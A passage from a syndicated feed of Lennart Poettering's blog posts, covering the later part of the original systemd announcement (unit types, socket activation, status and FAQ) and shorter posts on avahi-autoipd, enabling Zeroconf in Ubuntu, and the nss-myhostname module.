rule files. However, to me this appears mostly as an attempt to
fix a system whose core design is flawed.

Besides that Upstart does OK for babysitting daemons, even though
some choices might be questionable (see above), and there are certainly a lot
of missed opportunities (see above, too).

There are other init systems besides sysvinit, Upstart and
launchd. Most of them offer little substantial more than Upstart or
sysvinit. The most interesting other contender is Solaris SMF,
which supports proper dependencies between services. However, in
many ways it is overly complex and, let’s say, a bit academic
with its excessive use of XML and new terminology for known
things. It is also closely bound to Solaris specific features such
as the contract system.

Putting it All Together: systemd

Well, this is another good time for a little pause, because
after I have hopefully explained above what I think a good PID 1
should be doing and what the current most used system does, we’ll
now come to where the beef is. So, go and refill you coffee mug
again. It’s going to be worth it.

You probably guessed it: what I suggested above as requirements
and features for an ideal init system is actually available now,
in a (still experimental) init system called systemd, and
which I hereby want to announce. Again, here’s the
code.
And here’s a quick rundown of its features, and the
rationale behind them:

systemd starts up and supervises the entire system (hence the
name…). It implements all of the features pointed out above and
a few more. It is based around the notion of units. Units
have a name and a type. Since their configuration is usually
loaded directly from the file system, these unit names are
actually file names. Example: a unit avahi.service is
read from a configuration file by the same name, and of course
could be a unit encapsulating the Avahi daemon. There are several
kinds of units:

  1. service: these are the most obvious kind of unit:
    daemons that can be started, stopped, restarted, reloaded. For
    compatibility with SysV we not only support our own
    configuration files for services, but also are able to read
    classic SysV init scripts, in particular we parse the LSB
    header, if it exists. /etc/init.d is hence not much
    more than just another source of configuration.
  2. socket: this unit encapsulates a socket in the
    file-system or on the Internet. We currently support AF_INET,
    AF_INET6, AF_UNIX sockets of the types stream, datagram, and
    sequential packet. We also support classic FIFOs as
    transport. Each socket unit has a matching
    service unit, that is started if the first connection
    comes in on the socket or FIFO. Example: nscd.socket
    starts nscd.service on an incoming connection.
  3. device: this unit encapsulates a device in the
    Linux device tree. If a device is marked for this via udev
    rules, it will be exposed as a device unit in
    systemd. Properties set with udev can be used as
    configuration source to set dependencies for device units.
  4. mount: this unit encapsulates a mount point in the
    file system hierarchy. systemd monitors all mount points how
    they come and go, and can also be used to mount or
    unmount mount-points. /etc/fstab is used here as an
    additional configuration source for these mount points, similar to
    how SysV init scripts can be used as additional configuration
    source for service units.
  5. automount: this unit type encapsulates an automount
    point in the file system hierarchy. Each automount
    unit has a matching mount unit, which is started
    (i.e. mounted) as soon as the automount directory is
    accessed.
  6. target: this unit type is used for logical
    grouping of units: instead of actually doing anything by itself
    it simply references other units, which thereby can be controlled
    together. Examples for this are: multi-user.target,
    which is a target that basically plays the role of run-level 5 on
    classic SysV system, or bluetooth.target which is
    requested as soon as a bluetooth dongle becomes available and
    which simply pulls in bluetooth related services that otherwise
    would not need to be started: bluetoothd and
    obexd and suchlike.
  7. snapshot: similar to target units
    snapshots do not actually do anything themselves and their only
    purpose is to reference other units. Snapshots can be used to
    save/rollback the state of all services and units of the init
    system. Primarily it has two intended use cases: to allow the
    user to temporarily enter a specific state such as “Emergency
    Shell”, terminating current services, and provide an easy way to
    return to the state before, pulling up all services again that
    got temporarily pulled down. And to ease support for system
    suspending: still many services cannot correctly deal with
    system suspend, and it is often a better idea to shut them down
    before suspend, and restore them afterwards.

All these units can have dependencies between each other (both
positive and negative, i.e. ‘Requires’ and ‘Conflicts’): a device
can have a dependency on a service, meaning that as soon as a
device becomes available a certain service is started. Mounts get
an implicit dependency on the device they are mounted from. Mounts
also gets implicit dependencies to mounts that are their prefixes
(i.e. a mount /home/lennart implicitly gets a dependency
added to the mount for /home) and so on.

A short list of other features:

  1. For each process that is spawned, you may control: the
    environment, resource limits, working and root directory, umask,
    OOM killer adjustment, nice level, IO class and priority, CPU policy
    and priority, CPU affinity, timer slack, user id, group id,
    supplementary group ids, readable/writable/inaccessible
    directories, shared/private/slave mount flags,
    capabilities/bounding set, secure bits, CPU scheduler reset of
    fork, private /tmp name-space, cgroup control for
    various subsystems. Also, you can easily connect
    stdin/stdout/stderr of services to syslog, /dev/kmsg,
    arbitrary TTYs. If connected to a TTY for input systemd will make
    sure a process gets exclusive access, optionally waiting or enforcing
    it.
  2. Every executed process gets its own cgroup (currently by
    default in the debug subsystem, since that subsystem is not
    otherwise used and does not much more than the most basic
    process grouping), and it is very easy to configure systemd to
    place services in cgroups that have been configured externally,
    for example via the libcgroups utilities.
  3. The native configuration files use a syntax that closely
    follows the well-known .desktop files. It is a simple syntax for
    which parsers exist already in many software frameworks. Also, this
    allows us to rely on existing tools for i18n for service
    descriptions, and similar. Administrators and developers don’t
    need to learn a new syntax.
  4. As mentioned, we provide compatibility with SysV init
    scripts. We take advantages of LSB and Red Hat chkconfig headers
    if they are available. If they aren’t we try to make the best of
    the otherwise available information, such as the start
    priorities in /etc/rc.d. These init scripts are simply
    considered a different source of configuration, hence an easy
    upgrade path to proper systemd services is available. Optionally
    we can read classic PID files for services to identify the main
    pid of a daemon. Note that we make use of the dependency
    information from the LSB init script headers, and translate
    those into native systemd dependencies. Side note: Upstart is
    unable to harvest and make use of that information. Boot-up on a
    plain Upstart system with mostly LSB SysV init scripts will
    hence not be parallelized, a similar system running systemd
    however will. In fact, for Upstart all SysV scripts together
    make one job that is executed, they are not treated
    individually, again in contrast to systemd where SysV init
    scripts are just another source of configuration and are all
    treated and controlled individually, much like any other native
    systemd service.
  5. Similarly, we read the existing /etc/fstab
    configuration file, and consider it just another source of
    configuration. Using the comment= fstab option you can
    even mark /etc/fstab entries to become systemd
    controlled automount points.
  6. If the same unit is configured in multiple configuration
    sources (e.g. /etc/systemd/system/avahi.service exists,
    and /etc/init.d/avahi too), then the native
    configuration will always take precedence, the legacy format is
    ignored, allowing an easy upgrade path and packages to carry
    both a SysV init script and a systemd service file for a
    while.
  7. We support a simple templating/instance mechanism. Example:
    instead of having six configuration files for six gettys, we
    only have one getty@.service file which gets instantiated to
    getty@tty2.service and suchlike. The interface part can
    even be inherited by dependency expressions, i.e. it is easy to
    encode that a service dhcpcd@eth0.service pulls in
    avahi-autoipd@eth0.service, while leaving the
    eth0 string wild-carded.
  8. For socket activation we support full compatibility with the
    traditional inetd modes, as well as a very simple mode that
    tries to mimic launchd socket activation and is recommended for
    new services. The inetd mode only allows passing one socket to
    the started daemon, while the native mode supports passing
    arbitrary numbers of file descriptors. We also support one
    instance per connection, as well as one instance for all
    connections modes. In the former mode we name the cgroup the
    daemon will be started in after the connection parameters, and
    utilize the templating logic mentioned above for this. Example:
    sshd.socket might spawn services
    sshd@192.168.0.1-4711-192.168.0.2-22.service with a
    cgroup of sshd@.service/192.168.0.1-4711-192.168.0.2-22
    (i.e. the IP address and port numbers are used in the instance
    names. For AF_UNIX sockets we use PID and user id of the
    connecting client). This provides a nice way for the
    administrator to identify the various instances of a daemon and
    control their runtime individually. The native socket passing
    mode is very easily implementable in applications: if
    $LISTEN_FDS is set it contains the number of sockets
    passed and the daemon will find them sorted as listed in the
    .service file, starting from file descriptor 3 (a
    nicely written daemon could also use fstat() and
    getsockname() to identify the sockets in case it
    receives more than one). In addition we set $LISTEN_PID
    to the PID of the daemon that shall receive the fds, because
    environment variables are normally inherited by sub-processes and
    hence could confuse processes further down the chain. Even
    though this socket passing logic is very simple to implement in
    daemons, we will provide a BSD-licensed reference implementation
    that shows how to do this. We have ported a couple of existing
    daemons to this new scheme.
  9. We provide compatibility with /dev/initctl to a
    certain extent. This compatibility is in fact implemented with a
    FIFO-activated service, which simply translates these legacy
    requests to D-Bus requests. Effectively this means the old
    shutdown, poweroff and similar commands from
    Upstart and sysvinit continue to work with
    systemd.
  10. We also provide compatibility with utmp and
    wtmp. Possibly even to an extent that is far more
    than healthy, given how crufty utmp and wtmp
    are.
  11. systemd supports several kinds of
    dependencies between units. After/Before can be used to fix
    the ordering how units are activated. It is completely
    orthogonal to Requires and Wants, which
    express a positive requirement dependency, either mandatory, or
    optional. Then, there is Conflicts which
    expresses a negative requirement dependency. Finally, there are
    three further, less used dependency types.
  12. systemd has a minimal transaction system. Meaning: if a unit
    is requested to start up or shut down we will add it and all its
    dependencies to a temporary transaction. Then, we will
    verify if the transaction is consistent (i.e. whether the
    ordering via After/Before of all units is
    cycle-free). If it is not, systemd will try to fix it up, and
    removes non-essential jobs from the transaction that might
    remove the loop. Also, systemd tries to suppress non-essential
    jobs in the transaction that would stop a running
    service. Non-essential jobs are those which the original request
    did not directly include but which where pulled in by
    Wants type of dependencies. Finally we check whether
    the jobs of the transaction contradict jobs that have already
    been queued, and optionally the transaction is aborted then. If
    all worked out and the transaction is consistent and minimized
    in its impact it is merged with all already outstanding jobs and
    added to the run queue. Effectively this means that before
    executing a requested operation, we will verify that it makes
    sense, fixing it if possible, and only failing if it really cannot
    work.
  13. We record start/exit time as well as the PID and exit status
    of every process we spawn and supervise. This data can be used
    to cross-link daemons with their data in abrtd, auditd and
    syslog. Think of an UI that will highlight crashed daemons for
    you, and allows you to easily navigate to the respective UIs for
    syslog, abrt, and auditd that will show the data generated from
    and for this daemon on a specific run.
  14. We support reexecution of the init process itself at any
    time. The daemon state is serialized before the reexecution and
    deserialized afterwards. That way we provide a simple way to
    facilitate init system upgrades as well as handover from an
    initrd daemon to the final daemon. Open sockets and autofs
    mounts are properly serialized away, so that they stay
    connectible all the time, in a way that clients will not even
    notice that the init system reexecuted itself. Also, the fact
    that a big part of the service state is encoded anyway in the
    cgroup virtual file system would even allow us to resume
    execution without access to the serialization data. The
    reexecution code paths are actually mostly the same as the init
    system configuration reloading code paths, which
    guarantees that reexecution (which is probably more seldom
    triggered) gets similar testing as reloading (which is probably
    more common).
  15. Starting the work of removing shell scripts from the boot
    process we have recoded part of the basic system setup in C and
    moved it directly into systemd. Among that is mounting of the API
    file systems (i.e. virtual file systems such as /proc,
    /sys and /dev.) and setting of the
    host-name.
  16. Server state is introspectable and controllable via
    D-Bus. This is not complete yet but quite extensive.
  17. While we want to emphasize socket-based and bus-name-based
    activation, and we hence support dependencies between sockets and
    services, we also support traditional inter-service
    dependencies. We support multiple ways how such a service can
    signal its readiness: by forking and having the start process
    exit (i.e. traditional daemonize() behaviour), as well
    as by watching the bus until a configured service name appears.
  18. There’s an interactive mode which asks for confirmation each
    time a process is spawned by systemd. You may enable it by
    passing systemd.confirm_spawn=1 on the kernel command
    line.
  19. With the systemd.default= kernel command line
    parameter you can specify which unit systemd should start on
    boot-up. Normally you’d specify something like
    multi-user.target here, but another choice could even
    be a single service instead of a target, for example
    out-of-the-box we ship a service emergency.service that
    is similar in its usefulness as init=/bin/bash, however
    has the advantage of actually running the init system, hence
    offering the option to boot up the full system from the
    emergency shell.
  20. There’s a minimal UI that allows you to
    start/stop/introspect services. It’s far from complete but
    useful as a debugging tool. It’s written in Vala (yay!) and goes
    by the name of systemadm.

It should be noted that systemd uses many Linux-specific
features, and does not limit itself to POSIX. That unlocks a lot
of functionality a system that is designed for portability to
other operating systems cannot provide.

Status

All the features listed above are already implemented. Right
now systemd can already be used as a drop-in replacement for
Upstart and sysvinit (at least as long as there aren’t too many
native upstart services yet. Thankfully most distributions don’t
carry too many native Upstart services yet.)

However, testing has been minimal, our version number is
currently at an impressive 0. Expect breakage if you run this in
its current state. That said, overall it should be quite stable
and some of us already boot their normal development systems with
systemd (in contrast to VMs only). YMMV, especially if you try
this on distributions we developers don’t use.

Where is This Going?

The feature set described above is certainly already
comprehensive. However, we have a few more things on our plate. I
don’t really like speaking too much about big plans but here’s a
short overview in which direction we will be pushing this:

We want to add at least two more unit types: swap
shall be used to control swap devices the same way we
already control mounts, i.e. with automatic dependencies on the
device tree devices they are activated from, and
suchlike. timer shall provide functionality similar to
cron, i.e. starts services based on time events, the
focus being both monotonic clock and wall-clock/calendar
events. (i.e. “start this 5h after it last ran” as well as “start
this every monday 5 am”)

More importantly however, it is also our plan to experiment with
systemd not only for optimizing boot times, but also to make it
the ideal session manager, to replace (or possibly just augment)
gnome-session, kdeinit and similar daemons. The problem set of a
session manager and an init system are very similar: quick start-up
is essential and babysitting processes the focus. Using the same
code for both uses hence suggests itself. Apple recognized that
and does just that with launchd. And so should we: socket and bus
based activation and parallelization is something session services
and system services can benefit from equally.

I should probably note that all three of these features are
already partially available in the current code base, but not
complete yet. For example, already, you can run systemd just fine
as a normal user, and it will detect that is run that way and
support for this mode has been available since the very beginning,
and is in the very core. (It is also exceptionally useful for
debugging! This works fine even without having the system
otherwise converted to systemd for booting.)

However, there are some things we probably should fix in the
kernel and elsewhere before finishing work on this: we
need swap status change notifications from the kernel similar to
how we can already subscribe to mount changes; we want a
notification when CLOCK_REALTIME jumps relative to
CLOCK_MONOTONIC; we want to allow normal processes to get
some init-like powers
; we need a well-defined
place where we can put user sockets
. None of these issues are
really essential for systemd, but they’d certainly improve
things.

You Want to See This in Action?

Currently, there are no tarball releases, but it should be
straightforward to check out the code from our
repository
. In addition, to have something to start with, here’s
a tarball with unit configuration files
that allows an
otherwise unmodified Fedora 13 system to work with systemd. We
have no RPMs to offer you for now.

An easier way is to download this Fedora 13 qemu image, which
has been prepared for systemd. In the grub menu you can select
whether you want to boot the system with Upstart or systemd. Note
that this system is minimally modified only. Service information
is read exclusively from the existing SysV init scripts. Hence it
will not take advantage of the full socket and bus-based
parallelization pointed out above, however it will interpret the
parallelization hints from the LSB headers, and hence boots faster
than the Upstart system, which in Fedora does not employ any
parallelization at the moment. The image is configured to output
debug information on the serial console, as well as writing it to
the kernel log buffer (which you may access with dmesg).
You might want to run qemu configured with a virtual
serial terminal. All passwords are set to systemd.

Even simpler than downloading and booting the qemu image is
looking at pretty screen-shots. Since an init system usually is
well hidden beneath the user interface, some shots of
systemadm and ps must do:

systemadm

That’s systemadm showing all loaded units, with more detailed
information on one of the getty instances.

ps

That’s an excerpt of the output of ps xaf -eo
pid,user,args,cgroup
showing how neatly the processes are
sorted into the cgroup of their service. (The fourth column is the
cgroup, the debug: prefix is shown because we use the
debug cgroup controller for systemd, as mentioned earlier. This is
only temporary.)

Note that both of these screenshots show an only minimally
modified Fedora 13 Live CD installation, where services are
exclusively loaded from the existing SysV init scripts. Hence,
this does not use socket or bus activation for any existing
service.

Sorry, no bootcharts or hard data on start-up times for the
moment. We’ll publish that as soon as we have fully parallelized
all services from the default Fedora install. Then, we’ll welcome
you to benchmark the systemd approach, and provide our own
benchmark data as well.

Well, presumably everybody will keep bugging me about this, so
here are two numbers I’ll tell you. However, they are completely
unscientific as they are measured for a VM (single CPU) and by
using the stop timer in my watch. Fedora 13 booting up with
Upstart takes 27s, with systemd we reach 24s (from grub to gdm,
same system, same settings, shorter value of two bootups, one
immediately following the other). Note however that this shows
nothing more than the speedup effect reached by using the LSB
dependency information parsed from the init script headers for
parallelization. Socket or bus based activation was not utilized
for this, and hence these numbers are unsuitable to assess the
ideas pointed out above. Also, systemd was set to debug verbosity
levels on a serial console. So again, this benchmark data has
barely any value.

Writing Daemons

An ideal daemon for use with systemd does a few things
differently then things were traditionally done. Later on, we will
publish a longer guide explaining and suggesting how to write a daemon for use
with this systemd. Basically, things get simpler for daemon
developers:

  • We ask daemon writers not to fork or even double fork
    in their processes, but run their event loop from the initial process
    systemd starts for you. Also, don’t call setsid().
  • Don’t drop user privileges in the daemon itself, leave this
    to systemd and configure it in systemd service configuration
    files. (There are exceptions here. For example, for some daemons
    there are good reasons to drop privileges inside the daemon
    code, after an initialization phase that requires elevated
    privileges.)
  • Don’t write PID files
  • Grab a name on the bus
  • You may rely on systemd for logging, you are welcome to log
    whatever you need to log to stderr.
  • Let systemd create and watch sockets for you, so that socket
    activation works. Hence, interpret $LISTEN_FDS and
    $LISTEN_PID as described above.
  • Use SIGTERM for requesting shut downs from your daemon.

The list above is very similar to what Apple
recommends for daemons compatible with launchd
. It should be
easy to extend daemons that already support launchd
activation to support systemd activation as well.

Note that systemd supports daemons not written in this style
perfectly as well, already for compatibility reasons (launchd has
only limited support for that). As mentioned, this even extends to
existing inetd capable daemons which can be used unmodified for
socket activation by systemd.

So, yes, should systemd prove itself in our experiments and get
adopted by the distributions it would make sense to port at least
those services that are started by default to use socket or
bus-based activation. We have
written proof-of-concept patches
, and the porting turned out
to be very easy. Also, we can leverage the work that has already
been done for launchd, to a certain extent. Moreover, adding
support for socket-based activation does not make the service
incompatible with non-systemd systems.

FAQs

Who’s behind this?
Well, the current code-base is mostly my work, Lennart
Poettering (Red Hat). However the design in all its details is
result of close cooperation between Kay Sievers (Novell) and
me. Other people involved are Harald Hoyer (Red Hat), Dhaval
Giani (Formerly IBM), and a few others from various
companies such as Intel, SUSE and Nokia.
Is this a Red Hat project?
No, this is my personal side project. Also, let me emphasize
this: the opinions reflected here are my own. They are not
the views of my employer, or Ronald McDonald, or anyone
else.
Will this come to Fedora?
If our experiments prove that this approach works out, and
discussions in the Fedora community show support for this, then
yes, we’ll certainly try to get this into Fedora.
Will this come to OpenSUSE?
Kay’s pursuing that, so something similar as for Fedora applies here, too.
Will this come to Debian/Gentoo/Mandriva/MeeGo/Ubuntu/[insert your favourite distro here]?
That’s up to them. We’d certainly welcome their interest, and help with the integration.
Why didn’t you just add this to Upstart, why did you invent something new?
Well, the point of the part about Upstart above was to show
that the core design of Upstart is flawed, in our
opinion. Starting completely from scratch suggests itself if the
existing solution appears flawed in its core. However, note that
we took a lot of inspiration from Upstart’s code-base
otherwise.
If you love Apple launchd so much, why not adopt that?
launchd is a great invention, but I am not convinced that it
would fit well into Linux, nor that it is suitable for a system
like Linux with its immense scalability and flexibility to
numerous purposes and uses.
Is this an NIH project?
Well, I hope that I managed to explain in the text above why
we came up with something new, instead of building on Upstart or
launchd. We came up with systemd due to technical
reasons, not political reasons.
Don’t forget that it is Upstart that includes
a library called NIH
(which is kind of a reimplementation of glib) — not systemd!
Will this run on [insert non-Linux OS here]?
Unlikely. As pointed out, systemd uses many Linux specific
APIs (such as epoll, signalfd, libudev, cgroups, and numerous
more), a port to other operating systems appears to us as not
making a lot of sense. Also, we, the people involved are
unlikely to be interested in merging possible ports to other
platforms and work with the constraints this introduces. That said,
git supports branches and rebasing quite well, in case
people really want to do a port.
Actually portability is even more limited than just to other OSes: we require a very
recent Linux kernel, glibc, libcgroup and libudev. No support for
less-than-current Linux systems, sorry.
If folks want to implement something similar for other
operating systems, the preferred mode of cooperation is probably
that we help you identify which interfaces can be shared with
your system, to make life easier for daemon writers to support
both systemd and your systemd counterpart. Probably, the focus should be
to share interfaces, not code.
I hear [fill one in here: the Gentoo boot system, initng,
Solaris SMF, runit, uxlaunch, ...] is an awesome init system and
also does parallel boot-up, so why not adopt that?
Well, before we started this we actually had a very close
look at the various systems, and none of them did what we had in
mind for systemd (with the exception of launchd, of course). If
you cannot see that, then please read again what I wrote
above.

Pid Eins: avahi-autoipd Released and ‘State of the Lemur’

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

A few minutes ago I released Avahi 0.6.14
which besides other, minor fixes and cleanups includes a new component avahi-autoipd.
This new daemon is an implementation of IPv4LL (aka RFC3927, aka
APIPA), a method for acquiring link-local IP addresses (those from the range
169.254/16) without a central server, such as DHCP.

Yes, there are already plenty Free implementations of this protocol
available. However, this one tries to do it right and integrates well with the
rest of Avahi. For a longer rationale for adding this tool to our distribution
instead of relying on externals tools, please read this
mailing list thread
.

It is my hope that this tool is quickly adopted by the popular
distributions, which will allow Linux to finally catch up with technology that
has been available in Windows systems since Win98 times. If you’re a
distributor please follow these
notes
which describe how to integrate this new tool into your distribution
best.

Because avahi-autoipd acts as dhclient plug-in by default,
and only activates itself as last resort for acquiring an IP address I hope
that it will get much less in the way of the user than previous implementations
of this technology for Linux.

State of the Lemur

Almost 22 months after my first SVN commit to the flexmdns (which was the
name I chose for my mDNS implementation when I first started to work on it)
source code repository, 18 months after Trent and I decided to join our two
projects under the name “Avahi” and 12 months after the release of Avahi 0.1,
it’s time for a little “State of the Lemur” post.

To make it short: Avahi is ubiquitous in the Free Software world. ;-)

All major (Debian, Ubuntu, Fedora, Gentoo, Mandriva, OpenSUSE) and many
minor distributions have it. A quick Google-based poll I did a few weeks ago
shows that it is part of at least 19 different
distributions
, including a range of embedded ones. The list of applications
making native use
of the Avahi client API is growing, currently bearing 31
items. That list does not include the legacy HOWL applications and the
applications that use our Bonjour compatibility API which can run on top of
Avahi, hence the real number of applications that can make use of Avahi is
slightly higher. The first commercial hardware appliances which include Avahi are
slowly appearing on the market. I know of at least three such products, one
being Bubba.

If you package Avahi for a distribution, add Avahi support to an
application, or build a hardware appliance with Avahi, please make sure to add
an item to the respective lists linked above, it’s a Wiki. Thank you!
(Anonymous registration without Mail address required, though)

Pid Eins: ZeroConf in Ubuntu

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

(Disclaimer: I am not an Ubuntu user myself. But I happen to be the lead developer of Avahi.)

It came to my attention that Ubuntu is
discussing
whether
to
enable Zeroconf/Avahi in default installations. I would like to point out a few
things:

The “No Open Ports” policy: This policy (or at least the
way many people interprete it) seems to be thought out by someone who
doesn’t have much experience with TCP/IP networking. While it might make sense
to enforce this for application-level protocols like HTTP or FTP it doesn’t
make sense to apply it to transport-level protocols such as DHCP, DNS or in
this case mDNS (the underlying protocol of Zeroconf/Avahi/Bonjour):

  • Even the simplest DNS lookup requires the opening of an UDP port for a
    short period of time to be able to recieve the response. This is usually not
    visible to the administrator, because the time is too short to show up in
    netstat -uln, but nonetheless it is an open port. (UDP is not
    session-based (like TCP is) so incoming packets are accepted regardless where
    they come from)
  • DHCP clients listen on UDP port 68 during their entire lifetime (which in
    most cases is the same as the uptime of the machine). DHCP may be misused for
    much worse things than mDNS. Evildoers can forge DHCP packets to change IP
    addresses and routing of machines. This is definitely something that cannot be
    done with mDNS.

All three protocols, DNS, DHCP and mDNS, require a little bit of trust in
the local LAN. They (usually) don’t come with any sort of authentication and
they all are very easy to forge. The impact of forged mDNS packets is clearly
less dangerous than forged DHCP or DNS packets. Why? Because mDNS doesn’t
allow you to change the IP address or routing setup (which forged DHCP allows)
and because it cannot be used to spoof host names outside the .local
domain (which forged DNS allows).

Enforcing the “No Open ports” policy everywhere in Ubuntu would require that
both DNS and DHCP are disabled by default. However, as everybody probably
agrees, this would be ridiculous because a standard Ubuntu installation
couldn’t even be used for the most basic things like web browsing.

Oh, and BTW: DNS lookups are usually done by an NSS plugin which is loaded
by the libc into every process which uses gethostbyname() (the function for doing host name resolutions). So, in
effect every single process that uses this function has an open port for a
short time. And the DNS client code runs with user priviliges, so an exploit
really hurts. dhclient (the DHCP client) runs as root during the entire
runtime, so an exploit of it hurts even more. Avahi in contrast runs as its own user and
chroot()s
.

It is not my intention to force anyone to use my
software
. However, enforcing the “No Open Ports” policy unconditionally is
not a good idea. Currently Ubuntu makes exceptions for DHCP/DNS and so
it should for mDNS.

I do agree that publishing all kinds of local services with Avahi in a
default install is indeed problematic. However, if the “No Open Ports” policy
is enforced on all other application-level software, there shouldn’t be any
application that would want to register a service with Avahi.

Starting Avahi “on-demand” is not an option either, because it offers useful
services even when no local application is accessing is. Most notably this is
host name resolution for the local host name. (Hey, yeah, Zeroconf is more than
just stealing music.)

Remember: Zeroconf is about
Zero Configuration. Requiring the user to toggle some obscure
configuration option before he can use Zeroconf would make it a paradox.
Zeroconf was designed to make things “just work”. If it isn’t enabled by
default it is impossible to reach that goal.

Oh, and I enabled commmenting in my blog, if anyone wants to flame me on this…

Pid Eins: Introducing nss-myhostname

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

I am doing a lot of embedded Linux work lately. The machines we use configure their hostname depending on some external configuration options. They boot from a CF card, which is mostly mounted read-only. Since the hostname changes often but we wanted to use sudo we had a problem: sudo requires the local host name to be resolvable using gethostbyname(). On Debian this is usually done by patching /etc/hosts correctly. Unfortunately that file resides on a read-only partition. Instead of hacking some ugly symlink based solution I decided to fix it the right way and wrote a tiny NSS module which does nothing more than mapping the hostname to the IP address 127.0.0.2 (and back). (That IP address is on the loopback device, but is not identical to localhost.)

Get nss-myhostname while it is hot!

BTW: This tool I wrote is pretty useful on embedded machines too, and certainly easier to use than setterm -dump 1 -file /dev/stdout | fold -w 80. And it does color too. And looping. And is much cooler anyway.